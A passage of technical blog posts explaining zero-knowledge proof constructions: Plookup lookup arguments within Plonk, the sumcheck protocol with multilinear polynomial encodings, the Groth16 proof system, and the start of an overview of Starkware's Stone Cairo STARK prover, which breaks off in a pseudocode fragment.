$$z_{13} = \sum L_{i + 1} (x) \prod \frac{(\gamma + \beta \omega^i + a_i )(\gamma + k_1 \beta\omega^i + b_i )(\gamma + k_2 \beta\omega^i + c_i )}{(\gamma + \beta S_{\sigma 1,i} + a_i )(\gamma + k_1 \beta S_{\sigma 2, i} + b_i )(\gamma + k_2 \beta S_{\sigma 3,i} + c_i )}$$

The first term corresponds to the blinding polynomial, the second is the first Lagrange basis polynomial (it is one if $x = g$ and zero elsewhere), and the third one contains the grand product.</p>
The Plookup polynomial $z_2 (x)$ looks very similar, given by three terms,

$$z_{21} = (b_{17} x^2 + b_{18} x + b_{19} ) Z_H (x)$$

$$z_{22} = L_{1} (x)$$

$$z_{23} = \sum L_{i + 1} (x) \prod \frac{( 1 + \beta’ )( \gamma’ + f_i )(\gamma’(1 + \beta’) + t_i + \beta’ t_{i + 1} )}{(\gamma’ (1 + \beta’ ) + s_{2i - 1} + \beta’ s_{ 2i } )(\gamma’ (1 + \beta’ ) + s_{2i} + \beta’ s_{2i + 1} )}$$</p>
These polynomials are best calculated by obtaining the components for the grand product check (in evaluation form) and then interpolating using the fast Fourier transform. The prover commits to these two polynomials.</p>
Round 4 - Transforming into Quotients</h3>
Round 4 computes the linear combination of the constraint polynomial, the copy constraint polynomial, and the Plookup constraints. We have the following constraints:</p>
    1. All the assignments have to satisfy the general gates equations.</span></span>
    2. The permutation check polynomial $z_1 (x)$ should equal one at the first evaluation point. Using the machinery we learned in STARKs, we could translate the condition as  </span></span></code></pre>
$$\frac{z_1 (x) - 1}{x - g^1}$$

should be a polynomial. We can transform it into a more suitable form (so that all the constraints have the same vanishing polynomial)

$$L_1 (x) (z_1 (x) - 1)$$
3. The permutation argument’s constraints

$$\begin{align}

(\gamma + \beta x + a (x) )(\gamma + k_1 \beta x + b (x) )(\gamma + k_2 \beta (x) + c (x) )z_1 (x) &- \newline

(\gamma + \beta S_{\sigma 1} (x) + a (x) )(\gamma + k_1 \beta S_{\sigma 2} (x) + b (x) )(\gamma + k_2 \beta S_{\sigma 3} (x) + c (x) )z_1 (g x)

\end{align}$$
4. Enforcing the lookup gates,

$q_{lu} (x) ( a(x) + \zeta b(x) + \zeta^2 c(x) - f (x) )$
5. The product check for the Plookup polynomial

$$\begin{align}

(1 + \beta’)(\gamma’ + f(x) )(\gamma’(1 + \beta’) + t(x) + \beta’ t(g x)) z_2 (x) &- \newline

(\gamma’ (1 + \beta’ ) + h_{1} (x) + \beta’ h_{2} (x) )(\gamma’ (1 + \beta’ ) + h_{2} (x) + \beta’ h_1 (gx) )z_2 (g x)

\end{align}$$
6. The Plookup polynomial should be equal to one at the first point,

$L_1 (x) (z_2 (x) - 1)$</p>
All the constraints should hold over the interpolation domain. Each polynomial is divisible then by $Z_H (x)$, and so is the random linear combination of the polynomials. The result is the quotient polynomial, $q (x)$, which is split into three parts, each of at most degree $N + 1$

$q (x) = q_{lo} (x) + x^{N + 2} q_{mid} (x) + x^{2N + 4} q_{hi} (x)$</p>
The prover commits to each of the parts.</p>
Round 5 - Evaluations</h3>
Round 5 computes the evaluations of several polynomials at a random point $z$ and sends them to the verifier so that he has enough information to check the relationship between the quotient and the original polynomial. The prover samples from the transcript $z$ and computes:</p>
    * $a(z)$</span></span>
    * $b(z)$</span></span>
    * $c(z)$</span></span>
    * $S_{\sigma 1} (z)$</span></span>
    * $S_{\sigma 2} (z)$</span></span>
    * $f(z)$</span></span>
    * $t(z)$</span></span>
    * $t (gz)$</span></span>
    * $z_1 (gz)$</span></span>
    * $z_2 (gz)$</span></span>
    * $h_1 (gz)$</span></span>
    * $h_2 (z)$</span></span></code></pre>Round 6 - Wrapping the proof</h3>
Round 6 performs the linearizations and generates the opening proof. So far, the prover has given commitments to polynomials and their evaluations at some point. It’s time to link both and produce the evaluation proof. First, the prover computes the linearization polynomial, $r (x)$, which should equal $0$ at $z$. The prover computes the proof for the evaluation of all the polynomials listed in round 5 at $z$,

$$W_z (x) = \frac{1}{x - z}(r(x) + \sum \alpha^i (p_i(x) - p_i (z)))$$

He does the same for the polynomials at $gz$,

$$W_{gz} (x) = \frac{1}{x - gz}(\sum \alpha^i (p_i(x) - p_i (gz)))$$</p>
The prover commits to these quotient polynomials.</p>
All the evaluations at Round 5 give the proof, plus the commitments to all the polynomials from Rounds 1, 2, 3, 4, and 6.</p>
Conclusion</h2>
In this post, we covered the basics of lookup arguments, which let us prove that specific calculations are correct by checking their results in a table that contains all valid input/output relations. These techniques can result in significant savings when we try to prove difficult or expensive operations to arithmetize, such as range checks or bitwise operations (which can be extensively used). We described the working principles of Plookup, which was among the first arguments to be presented. It can be integrated very neatly into the Plonk protocol, but it results in an extra cost since we have the calculation time increases with table size. Recent constructions reduce the cost associated with the size of the table, paying just a price proportional to the number of lookups. In upcoming posts, we will cover how to code the Plookup protocol and newer lookup arguments.</p>


Have you checked your sums?
Unknown — Thu, 26 Oct 2023 00:00:00 +0000
Introduction</h2>
There has recently been a growing interest in zk-SNARKs (zero-knowledge, succinct, non-interactive arguments of knowledge) due to their capabilities in decentralized private computations and scaling blockchains. These constructions involve a protocol between two parties, a prover and a verifier, where the former attempts to convince the latter of the validity of a given statement. Sometimes, the prover tries to do this without revealing sensitive information. We want the work needed for the verifier to check the statement to be significantly smaller than just doing it himself. For example, we would like to delegate an expensive computation to an untrusted server (for which we do not have the necessary resources) and be able to verify the correctness of the computation using a smartphone. The zero-knowledge property allows us to prove the possession of some secret (such as a private key or the preimage of some hash) without giving that information to the verifier. At the heart of these constructions, we have polynomials and can reduce the statement to some relation between polynomials. For example, STARKs</a> uses univariate polynomials and the FRI protocol to prove the correctness of a given computation. The sumcheck protocol, which involves polynomials in several variables, can be used to build SNARKs.</p>
In this post, we will first describe how to encode vectors as multilinear polynomials (similar to how we encoded vectors as univariate polynomials) and how the sumcheck protocols work. We are currently implementing the sumcheck protocol and multilinear polynomials as part of the learning path of the Sparkling Water Bootcamp</a>; you can follow the development at Lambdaworks</a>.</p>
Encoding vectors as multilinear polynomials</h2>
A polynomial $p$ in $n$ variables is called multilinear if the degree of each variable $x_i$ is at most one in every term. For example, $p_1 (x_1 , x_2 , x_3 , x_4 ) = x_1 + 2 x_2 + x_1 x_2 x_4 x_3$ is a multilinear polynomial because the power of each $x_i$ is either $0$ or $1$ in each term. The polynomial $p_2 (x_1 , x_2 ) = x_1 x_2^2$ is not, since the degree of $x_2$ is $2$. The total degree of a multilinear polynomial is the highest sum of all the powers of a term (monomial). For $p_1$, this is 4. For multilinear polynomials, the maximum degree is at most $m$.</p>
We will restrict ourselves now to polynomials defined over the set $D = { 0 , 1 }^m$. Given a function $f$ defined over $D$, we can define a multilinear polynomial $p(x_1, x_2, … , x_m )$ such that $p$ coincides with $f$ over the set $D$, that is $p(x) = f (x)$ for every $x \in D$. Since this polynomial is unique, the polynomial $p$ is called the multilinear extension of $f$.</p>
We can use the multilinear extension to represent a vector $v$ containing $2^m$ elements. Suppose the vector $v$ ’s elements belong to some finite field $\mathbb{F}$. We first create the function $f: D \rightarrow \mathbb{F}$, which maps each element of $D$ into an element of $v$. One easy way to do this is by representing the position in the vector $k$ in its bit form. For example, if the vector has 256 elements, we need $8$ variables (bits), and we can define the map as:

$f(0, 0, 0, 0, 0, 0, 0, 0) = v_0$

$f(0, 0, 0, 0, 0, 0, 0, 1) = v_1$

$f(0, 0, 0, 0, 0, 0, 1, 0) = v_2$

$f(0, 0, 0, 0, 0, 0, 1, 1) = v_3$

$\vdots$

$f(1, 1, 1, 1, 1, 1, 1, 1) = v_{255}$

In general form, we assign to a tuple $(x_0, x_1, … x_{m - 1} )$ the value corresponding to index $k = x_0 + 2 x_1 + 4x_2 + \dots + 2^{m - 1} x_{ m - 1 }$. Then, we can use the fact that the multilinear extension of $f$ exists and create it by Lagrange interpolation, for example. Thus,

$p(x_0 , x_1 , … x_{m - 1} ) = \sum_{ x_0 , …, x_{ m -1} } f(k) B_k (x_0 , x_1 , … , x_{ m - 1} )$

where $B_k$ is the Lagrange basis polynomial, which equals one when $(x_0 , x_1 , … , x_{ m -1 })$ corresponds to the binary representation of $k$ and zero otherwise. If we represent $k = (k_0, k_1 , … k_{ m - 1})$ (remember each $k_i$ is either 0 or 1), the function $B_k(x_0, x_1, … x_{ m - 1 })$ has the explicit expression

$B_k (x_0 , x_1 , …, x_{ m - 1}) = \prod ( x_i k_i + (1 - x_i ) (1 - k_i))$</p>
For example, if we have the vector $v = ( 2, 5, 7, 8)$, we have four Lagrange basis polynomials:

$B_0 (x_0 , x_1 ) = (1 - x_0) (1 - x_1 ) = 1 - x_1 - x_0 + x_1 x_0$

$B_1 (x_0 , x_1 ) = x_0 (1 - x_1 ) = x_0 - x_0 x_1$

$B_2 (x_0 , x_1 ) = (1 - x_0 ) x_1 = x_1 - x_0 x_1$

$B_3 (x_0 , x_1 ) = x_0 x_1$

and

$p(x_0 , x_1) = 2 B_0 + 5 B_1 + 7 B_2 + 8 B_3$

Replacing everything,

$p(x_0 , x_1) = 2 + 3 x_0 + 5 x_1 - 2 x_0 x_1$</p>
This way, we have encoded our vector as a multilinear polynomial in two variables. We could generally encode a vector of length $n$ as a polynomial in $\lceil{\log_2 (n)} \rceil$ variables. We can then use this encoding to reduce the validity of some calculation to the sum of this polynomial over all possible values of $x_0, x_1 … x_n$.</p>
The sumcheck protocol</h2>
The sumcheck protocol is an interactive proof introduced in 1992 with a fundamental role in the theory of probabilistic proofs in complexity theory and cryptography, leading to the construction of succinct arguments. One of its essential properties is that the prover can be implemented in a number of operations that scale linearly (that is, its running time is $\mathcal{O} (n)$), which has a better asymptotic complexity than algorithms based on the Fast Fourier Transform ($\mathcal{O} (n \log n)$). It also provides the basis for folding techniques for Pedersen commitments in the discrete logarithm setting. For an in-depth explanation of the protocol, look at proofs, arguments and zero-knowledge</a> and sumcheck arguments and their applications</a>.</p>
The sumcheck protocol yields an interactive proof for statements of the form

$$\sum_{ x \in H^m } p(x) = S$$

that is, the sum of all the evaluations of an $m$-variate polynomial over a domain equals $S$. The prover is given the polynomial $p(x)$, and the verifier will send him random challenges, $r_k$, from a set $\mathcal{C}$ and receive polynomials $q_k(x)$, which will allow him to be convinced that the statement is true. The protocol will reduce the workload of the verifier from having to evaluate the $m$-variate polynomial over $\vert H \vert^m$ (for example, if the size of $H$, $\vert H\vert$, is two and we have 16 variables, we need to do $2^{16}$ evaluations) to a single evaluation over a random point over $\mathbb{F}^m$, plus some additional smaller operations.</p>
The protocol proceeds in rounds and works as follows:</p>
    1. The prover sends to the verifier the polynomial  </span></span></code></pre>
$$q_k (x) = \sum_{ a_j \in H , j \geq k + 1 } p(r_1, r_2, …, r_{ k - 1 }, x, a_{ k + 1}, … a_{m})$$
2. The verifier checks that $\sum_{a_1 \in H} q_1 (a_1) = S$ and $\sum_{a_k \in H} q_k ( a_k ) = q_{ k - 1 }( r_{k - 1})$.
3. If all checks pass, the verifier outputs $v = q_m ( r_m )$ and outputs $r_1 , r_2 , …, r_m , v$.</p>
Let’s explain the protocol in simple terms. In the first round, the prover sends the verifier a polynomial $q_1 (x_1 )$ by summing over all possible values of the rest of the variables. This way, the verifier can check the sum by evaluating the polynomial $q_1 (x_1)$ over all its values, which is much faster than summing over all the variables. However, how does the verifier know that the prover did not cheat and send some fake polynomial $q_1 (x_1)$? The verifier sends a random challenge $r_1$, and the prover responds with a new polynomial of one variable, $q_2 (r_1, x_2)$, which is obtained by fixing the first coordinate and summing over all the other variables except $x_2$. If we evaluate $q_1 (r_1 )$, we should get the same as adding over all possible values of $q_2 (x_2 )$ (because $q_1$ was obtained by summing over all values of $x_2$). The verifier always has to do a few evaluations of a univariate polynomial.</p>
If the challenge subset $\mathcal{C}$ is a sampling subset, then the sumcheck protocol satisfies:</p>
a. Completeness.

b. Soundness, where the soundness error is bounded by $m d/ \vert \mathcal{C} \vert$ (the number of variables, the maximum degree in the polynomial, and the number of elements in the challenge subset).</p>
In many cases, we would like to work with $H^m = \{ 0,1 \}^m$, so that $x = (x_1 , x_2 , … , x_m)$ is the collection of all bitstrings of length $m$ and we can use the encoding for vectors as multilinear polynomials.</p>
To make the sumcheck protocol zero-knowledge, we need to mask the polynomial. We can achieve this by adding a random polynomial.</p>
Conclusion</h2>
In this post, we covered the sumcheck protocol, which is at the heart of some SNARKs. It allows the verifier to check that the sum of the evaluations of some multivariate polynomial over a set is equal to some number by delegating most of the computational burden to the prover. The protocol involves a number of rounds equal to the number of variables, where the prover sends at each round a univariate polynomial, and the verifier responds by sending a random challenge. The verifier’s highest cost is involved in evaluating the multivariate at one random point, significantly less than trivial verification. In an upcoming post, we will cover how to implement the sumcheck protocol from scratch.</p>


An overview of the Groth16 proof system
Unknown — Tue, 17 Oct 2023 00:00:00 +0000
Introduction</h2>
Over the last decade, SNARKs (succinct, non-interactive arguments of knowledge) and STARKs (scalable, transparent arguments of knowledge) have been gaining attention due to their applications in verifiable private computation and scalability of blockchains.</p>
Groth introduced this proof system</a> in 2016 and saw an early application in ZCash. The protocol relies on pairing-friendly elliptic curves, such as BN254, BLS12-381, and BLS12-377 (more later). Its proof size is among the smallest (consisting of only three elliptic curve elements) and fastest to verify. The main drawback is that it needs a trusted setup per program. In other words, we need to regenerate all the parameters whenever we want to prove a new program (or change the original one).</p>
In this post, we will describe the main ingredients of Groth16 and how it works. As stated in the roadmap, we are implementing the protocol in the Lambdaworks library</a>. It is also used as a project in the ongoing Sparkling Water Bootcamp</a>.</p>
Arithmetization</h2>
To prove the execution of a given program, we have to transform it to a SNARK (succinct, non-interactive argument of knowledge) friendly form. One of such forms is arithmetic circuit satisfiability, where one can prove knowledge of a valid circuit assignment. This first step, known as arithmetization, is the program’s transformation into an arithmetic circuit or equivalent form.</p>
R1CS</h2>
Arithmetic circuits can be expressed equivalently as (quadratic) rank one constraint systems (R1CS), which are systems of equations of the form:

$$(Az)\times (Bz) = Cz$$

where $A, B, C$ are matrices of size $m + 1$ rows by $n + 1$ columns, $z$ is a (column) vector of size $n + 1$ and $\times$ indicates the componentwise product of the resulting vectors.</p>
We can alternatively view this compact form as

$\left( \sum_k a_{0k} z_k \right) \left( \sum_k b_{0k} z_k \right) - \left( \sum_k c_{0k} z_k \right) = 0$

$\left( \sum_k a_{1k} z_k \right) \left( \sum_k b_{1k} z_k \right) - \left( \sum_k c_{1k} z_k \right) = 0$

$\left( \sum_k a_{2k} z_k \right) \left( \sum_k b_{2k} z_k \right) - \left( \sum_k c_{2k} z_k \right) = 0$

$\vdots$

$\left( \sum_k a_{mk} z_k \right) \left( \sum_k b_{mk} z_k \right) - \left( \sum_k c_{mk} z_k \right) = 0$</p>
We could express these equations more compactly by using polynomials and prove the solution of the R1CS system more concisely. To this end, we will introduce quadratic arithmetic programs, QAP</a>.</p>
Quadratic Arithmetic Program</h2>
We can interpret each column of the $A$ matrix as evaluations of some polynomial over some suitable domain. This is a common practice in many SNARKs, where we try to encode a vector as a polynomial; see, for example, our post about STARKs</a>. We sample $D_0 = { x_0 , x_1 , … , x_n }$ over the finite field and define the polynomial $A_i (x)$ as the polynomial of at most degree $n$ such that $A_i ( x_k ) = a_{ki}$.</p>
For performance reasons, it is convenient to select as interpolation domain $D_0$ the n-th roots of unity since we can use the Fast Fourier Transform to interpolate. Similarly, we can interpret the columns of $B$ and $C$ as polynomials $B_k (x)$ and $C_k (x)$. Taking advantage of these polynomials, we can express the R1CS system in polynomial form,

$P (x) = \left( \sum_k A_{k} (x) z_k \right) \left( \sum_k B_{k} (x) z_k \right) - \left( \sum_k C_{k} (x) z_k \right)$</p>
We can see that if we have a valid solution for the R1CS, the polynomial $P (x)$ evaluates to $0$ over $D_0$ (since we require the polynomial to interpolate the values of the columns of the matrices). Therefore, we can express the condition as

$P (x) = 0$ for $x \in D_0$

We now introduce the vanishing polynomial over the set $D_0$, $Z_D (x) = \prod_k (x - x_k )$

So, if the polynomial $P (x)$ evaluates to $0$ over $D_0$, it is divisible by $Z_D (x)$. This can be written as there is some polynomial $h (x)$ such that

$P (x) = h(x) Z_D (x)$

The degree of the polynomial $h(x)$ is the degree of $P$ minus the degree of $Z_D$. An honest prover should be able to find the resulting quotient and use it to show that he correctly executed the program.</p>
Transforming QAP into a zero-knowledge proof</h2>
We need to make some transformation to the above problem if we want to turn it into a zero-knowledge proof. For a more detailed description of this process, see here</a>. We must ensure that the prover cannot cheat and that the verifier cannot learn anything about the private input or witness. One key ingredient is a polynomial commitment scheme (PCS): we can make the prover commit to a given polynomial so that he cannot change it later. One such commitment scheme is the KZG commitment</a>, where we use pairing-friendly elliptic curves</a> to bind the prover to a polynomial. The scheme’s security relies on the hardness of the discrete logarithm problem over the curve. Pairings can be considered an operation that allows a one-time multiplication between points in an elliptic curve. In our case, we will work over type3 III pairings, $\dagger : G_1 \times G_2 \rightarrow G_t$, which have the following nice property (bilinearity):

$(a g_1 ) \dagger (b g_2 ) = (ab) (g_1 \dagger g_2)$

To commit to a polynomial using KZG, we need to sample a random scalar $\tau$ (which is considered toxic waste and should be forgotten, or we could forge proofs) and generate the following sequence of points in the elliptic curve, whose generator is $g_1$,

$P_0 = g_1$,

$P_1 = \tau g_1$

$P_2 = \tau^2 g_1$

$\vdots$

$P_n = \tau^n g_1$

Then, given a polynomial $p(x) = a_0 + a_1 x + a_2 x^2 + … + a_n x^n$ we compute the commitment as

$\mathrm{cm} (p) = a_0 P_0 + a_1 P_1 + … + a_n P_n$

which is the same as $\mathrm{cm} (p) = p(\tau) g_1$, that is, hiding the evaluation of $p(x)$ inside the elliptic curve. Because the discrete log problem is hard, we cannot use our knowledge of $g_1$ and $\mathrm{cm} (p)$ to obtain $p(\tau)$.</p>
To check that the polynomial $p(x)$ evaluates to $v$ at $z$ we can use the fact that

$p(x) - v = (x - z)q(x)$

where $q(x)$ is the quotient polynomial of the division of $p(x)$ by $x - z$. The prover can produce proof of such evaluation by committing to $q(x)$ using the same trick. Still, the verifier will need some additional information (included in the verifying key), $g_2$ (the generator of the group $G_2$), and $\tau g_2$ (remember, nobody must know $\tau$). Then, using pairings, the verifier can check the evaluation using the points in the elliptic curves,

$(\mathrm{cm} (p) - vg_1 \dagger g_2) = a = p(\tau) (g_1 \dagger g_2)$

$\mathrm{cm} (q) \dagger (\tau g_2 - z g_2) = b = q(\tau) ( \tau - z)(g_1 \dagger g_2)$

If $a$ and $b$ are the same, and since $\tau$ is a random point with high probability, we assume that $p(z) = v$ (This depends on the Schwartz-Zippel lemma).</p>
Remember that we want to prove that the verifier knows some $w$ and a polynomial $h(x)$ of degree $m - 1$ such that if $z= (1, x, w)$, the following condition holds

$\left( \sum_k A_{k} (x) z_k \right) \left( \sum_k B_{k} (x) z_k \right) = \left( \sum_k C_{k} (x) z_k \right) + h(x)Z_D (x)$</p>
If we force the prover first to commit to the polynomials $A_k (x)$ and $B_k (x)$ and then produce the quotient polynomial, we have to make sure that he cannot forge $C_k (x)$ to fulfill the previous condition. To do so, we are going to introduce random shifts ($\alpha$ and $\beta$) to the evaluations:

$\mathrm{cm} (\sum A_i z_i ) = \sum (A_i (\tau) z_i) g_1 + \alpha g_1$

$\mathrm{cm} (\sum B_i z_i) = \sum (B_i (\tau) z_i) g_2 + \beta g_2$

The $B_i (x)$ are committed to using group $G_2$ so that we can compute the product on the left-hand side through a pairing,

$(\mathrm{cm} (\sum A_i z_i )) \dagger ( \mathrm{cm} (\sum B_i z_i )) = (\sum A_i (\tau) z_i )(\sum B_i (\tau) z_i ) (g_1 \dagger g_2)$</p>
Because we introduce these shifts, we need to modify the $C_k$ term accordingly,

$\begin{equation}\left( \alpha + \sum_k A_{k} (x) z_k \right) \left( \beta + \sum_k B_{k} (x) z_k \right) = \ \alpha \beta + \left( \sum_k (C_{k} (x) + \beta A_k (x) + \alpha B_k (x)) z_k \right) + h(x)Z_D (x) \end{equation}$

Since the prover cannot know $\alpha$ and $\beta$, we need to provide them hidden as part of the trusted setup, as $\alpha g_1$ and $\beta g_2$, so that we can compute

$(\alpha g_1) \dagger (\beta g_2) = \alpha \beta (g_1 \dagger g_2)$

so that we can compare this result to the pairing between the shifted $A_i$ and $B_i$.</p>
Also, since the prover does not have $\alpha$ and $\beta$, he needs to be supplied with all the elements of the form $C_{k} (x) + \beta A_k (x) + \alpha B_k (x)$. However, when we want to calculate the product between these terms and $z$, we must recall that $z$ contains both the public input and the witness. The verifier cannot learn anything about the witness (therefore, the evaluations involving the witness should be provided by the prover). We introduce two additional variables, $\gamma$, and $\delta$, to split the variable $z$ between public input and witness. The first $k$ terms correspond to the public input, and these are encoded as

$K_i^v = \gamma^{- 1} (C_{i} (\tau) + \beta A_i (\tau) + \alpha B_i (\tau)) g_1$

for $i = 0, 1, 2 … , k$. For the witness, we have

$K_i^p = \delta^{- 1} (C_{i} (\tau) + \beta A_i (\tau) + \alpha B_i (\tau)) g_1$

With these new parameters, we get

$\begin{equation}\left( \alpha + \sum_j A_{j} (x) z_j \right) \left( \beta + \sum_j B_{j} (x) z_j \right) = \ \alpha \beta + \gamma \left( \sum_i^k \gamma^{- 1} (C_{i} (x) + \beta A_i (x) + \alpha B_i (x)) x_i \right) + \

\delta \left( \sum_{j = k + 1}^n \delta^{- 1} (C_{i} (x) + \beta A_i (x) + \alpha B_i (x)) x_i \right) + h(x)Z_D (x) \end{equation}$

We can combine the last two terms into one (since they contain all the information that the verifier must not learn)

$D = \left( \sum_{j = k + 1}^n \delta^{- 1} (C_{i} (x) + \beta A_i (x) + \alpha B_i (x)) x_i \right) + h(x)Z_D (x)\delta^{- 1}$</p>
Since we want to compute the product $h(x) Z_D(x)$ with the help of one pairing, we can compute the following group elements,

$Z_0 = \delta^{ - 1} Z_D (\tau)$

$Z_1 = \delta^{ - 1} \tau Z_D (\tau)$

$Z_2 = \delta^{ - 1} \tau^2 Z_D (\tau)$

$\vdots$

$Z_{m - 1} = \delta^{ - 1} \tau^{ m - 1 } Z_D (\tau)$</p>
With these changes, the right-hand side of the QAP is the sum of 3 terms:

A constant (related to the random shifts).

A term involving the public input.

A term that contains the secret terms (known only to the prover).</p>
Setup</h2>
Groth16 requires sampling five random field elements to generate the proving and verifying key, $t, \alpha, \beta, \gamma, \delta$. These are toxic waste and should be discarded and wholly forgotten once the keys have been generated.</p>
We will use a pairing-friendly elliptic curve (with type III pairing), with subgroups $G_1$ and $G_2$ of prime order $r$. We will call the generators $g_1$ and $g_2$, respectively. To make notation easier, we will write

$[x]_1 = x g_1$

$[x]_2 = x g_2$

to denote points in $G_1$ and $G_2$, where $x g$ means the scalar product of $x$ and the generator of the group (i.e., applying x times the elliptic curve group operation to the generator). We will follow the notation given by DIZK</a>. First, we compute the following vectors,

$K_i^v (t) = \gamma^{-1} \left( \beta A_i(t) + \alpha B_i (t) + C_i (t)\right)$

for $i = 0, 1, 2 , … k$,

$K_i^p (t) = \delta^{-1} \left( \beta A_i(t) + \alpha B_i (t) + C_i (t)\right)$

for $i = k+1, 1, 2 , … n$ and

$Z_k (t) = t^k Z_D (t) \delta^{-1}$

for $k = 0, 1, 2, … m - 1$.

The proving key consists of the following elements:</p>
    1. $[\alpha]_1$</span></span>
    2. $[\beta]_1$</span></span>
    3. $[\beta]_2$</span></span>
    4. $[\delta]_1$</span></span>
    5. $[\delta]_2$</span></span>
    6. $[A_0 (t) ]_1, [A_1 (t) ]_1 , ... , [A_n (t) ]_1$</span></span>
    7. $[B_0 (t) ]_1, [B_1 (t) ]_1 , ... , [B_n (t) ]_1$</span></span>
    8. $[B_0 (t) ]_2, [B_1 (t) ]_2 , ... , [B_n (t) ]_2$</span></span>
    9. $[K_{ k + 1 }^p (t)] , [ K_{ k + 2 }^p (t)] , ... , [K_n^p (t)]$</span></span>
    10. $[Z_0 (t)] , [Z_1 (t)] , ... , [ Z_{ m - 1 } (t)]$</span></span></code></pre>
The verifying key is much shorter and will contain in addition the value of one pairing because that value is constant:</p>
    1. $[\alpha]_1 \dagger [\beta]_2$</span></span>
    2. $[\gamma]_2$</span></span>
    3. $[\delta]_2$</span></span>
    4. $[K_0^v (t)]_1 , [K_1^v (t)]_1 , ... , [K_k^v (t)]_1$</span></span></code></pre>Proof generation</h2>
The prover receives the proving key and knows the polynomials representing the program and the public input, and he wants to prove that he has a witness satisfying that program. First, the prover needs to calculate the quotient polynomial $h(x)$ or, more precisely, its coefficients. The prover has to calculate

$$h(x) = \frac{\sum A_k(x) z_k \sum B_k (x) z_k - \sum C_k (x) z_k}{Z_D (X) }$$</p>
The best way to evaluate this quotient is by choosing a domain $D_{ev}$, of size at least the degree of the quotient polynomial plus one and not containing elements from $D_0$ (the interpolation domain) and evaluating numerator and denominator at all the elements of $D_{ev}$. Since we have at least as many evaluations of the polynomial $h (x)$ as its degree plus one, we can reconstruct $h(x)$ via interpolation. In practice, the fastest way to do this is by using the Fast Fourier Transform for evaluation and interpolation. The prover now possesses a vector of coefficients $h_0 , h_1 , h_2 , … , h_m$.</p>
To ensure that the proof is zero-knowledge, the prover sample two random scalars, $r$ and $s$.</p>
The prover can compute the three elements of the proof, $\pi = ([\pi_1 ]_1 , [\pi_2 ]_2 , [\pi_3 ]_1)$ by doing the following calculations,

$[\pi_1 ]_1 = [\alpha]_1 + \sum z_k [A_k (t) ]_1 + r [\delta]_1$

$[\pi_2 ]_2 = [\beta]_2 + \sum z_k [B_k (t) ]_2 + s[\delta]_2$

$[\pi_2 ]_1 = [\beta]_1 + \sum z_k [B_k (t) ]_1 + s[\delta]_1$

$[h(t)z(t)]_1 = \sum h_i [Z_i (t)]_1$

$[\pi_3 ]_1 = \sum w_i [K_i^p ]_1 + [h(t)z(t)]_1 + s[\pi_1 ]_1 + r [\pi_2 ]_1 - rs [\delta]_1$</p>
Verification</h2>
The verifier has the verifying key, the public input and parses the proof as $[\pi_1 ]_1, [\pi_2 ]_2, [\pi_3 ]_1$ and computes the following:

$[\pi_1 ]_1 \dagger [\pi_2 ]_2 = P_1$

$[\pi_3 ]_1 \dagger [\delta]_2 + [\alpha]_1 \dagger [\beta]_2 + \left(\sum x_i [K_i^v ]_1 \right) \dagger [\gamma]_2 = P_2$</p>
The proof is valid if $P_1$ and $P_2$ coincide. This is equivalent to checking the modified QAP.</p>
Conclusion</h2>
In this post, we covered the Groth16 protocol, which provides a framework to prove the correctness of a computation without revealing sensitive information. It has concise proofs and an elegant verification but requires a trusted setup for every program we want to prove. We saw the steps to transform the program into arithmetic circuits or their equivalent R1CS, which can then be compiled into a quadratic arithmetic program. We explained how the protocol transforms the basic equations to ensure that the prover cannot cheat and the verifier does not learn anything about the private data. In an upcoming post, we will cover how to code Groth16 from scratch.</p>


An overview of the Stone Cairo STARK Prover
Unknown — Thu, 28 Sep 2023 00:00:00 +0000
Introduction</h2>
About one month ago, Starkware open-sourced its Stone Prover, which is currently in production in Starknet. It is a library that allows one to produce proofs of computational integrity using STARKs (Scalable Transparent Arguments of Knowledge).</p>
The codebase has around 100k lines of code, written mainly in C++. It has the following main components:</p>
    * AIR: contains the constraints of the algebraic intermediate representation of CAIRO.</span></span>
    * Channel (transcript in STARK Platinum): contains the interactions between the prover and verifier and gives methods to sample random challenges.</span></span>
    * Composition polynomial. The constraints of the AIR are enforced over the trace polynomials and randomly combined into a single polynomial.</span></span>
    * Commitment schemes: contains the methods to (cryptographically) commit to a series of polynomial evaluations.</span></span>
    * FRI, Fast Reed Solomon interactive oracle proofs of proximity: performs the low-degree testing that allows one to prove that a function is close to a low-degree polynomial.</span></span></code></pre>
At Lambdaclass, we are working on our Cairo prover, STARK Platinum (written in Rust), being compatible with the Stone Prover so that anyone can use the Rust version to generate valid proofs for different applications built on top of Starknet. We hope that the performance and usability of our prover helps the community to adopt it.</p>
In this post, we will analyze some of the components of the Stone Prover and explain how they work and their implementation. For an introduction to STARKs, see our previous posts</a> or the STARK Platinum docs</a>.</p>
Domains</h2>
Every implemented field $\mathbb{F}$ has a generator $\omega$ of the unit groups $\mathbb{F}^\times$. They can be obtained by calling the class method Generator</code> of PrimeFieldElement</code>. The generator for the Stark252Field</code> is $\omega = 3$ (here</a> and here</a>).</p>
The class representing a domain is ListOfCosets</code></a>. The method TraceGenerator</code> returns a primitive root of unity $g$ of the order of the trace length $2^n$ that generates a domain $D$. It is computed as $g = \omega^{ ( p - 1 ) / 2^n }$. The LDE is then represented as a list of cosets ${h^i w D: i = 0, \dots , k - 1 }$ all of the same size as $D$, such that their union is the actual LDE domain:</p>
$$D_{\text{LDE}} = w D , \cup , h w D , \cup , h^2 w D , \cup , \cdots , \cup , h^{k-1} w D,$$

where $h = w^{( p - 1 ) / 2^{ n + k }}$.</p>
Transcript</h2>
The stone prover uses a NonInteractiveProverChannel</code> class to handle its interactions with the transcript. There are two basic operations:</p>
    * `SendBytes`: the prover appends bytes to the transcript.</span></span>
    * `ReceiveBytes`: the prover receives bytes from the transcript.</span></span></code></pre>
These operations are building blocks for more complex operations, such as sampling a FieldElement</code> or a number. Several hash functions can be used to interact with the transcript (e.g., Keccak, Pedersen).</p>
These operations are mainly implemented in the HashChain</code> class, with other classes just delegating to it. It has the following attributes:</p>
    * `self.counter`: counts how many blocks of $K$ bytes have been consumed.</span></span>
    * `self.hash`: holds the current state of the hash function.</span></span>
    * `self.spare_bytes`: when a user asks for $T$ bytes where $T$ is not multiple of $K$, it stores them to use them later on.</span></span></code></pre>
Here, $K$ is the number of bytes needed to store the output of the chosen hash functions (e.g., 32 bytes for Keccack256).</p>
Appending to the transcript</h3>
When bytes $X$ are appended to the transcript, the current digest $D$ is obtained and interpreted as a BigInt. Then, a seed increment is added to it. The concatenation of this new seed and $X$ is the latest state of the hash function.</p>
Pseudocode:</p>
def append(new_bytes, seed_increment):</span></span>
    digest = self.hash.digest()</span></span>
    new_seed = digest + self.seed_increment</span></span>
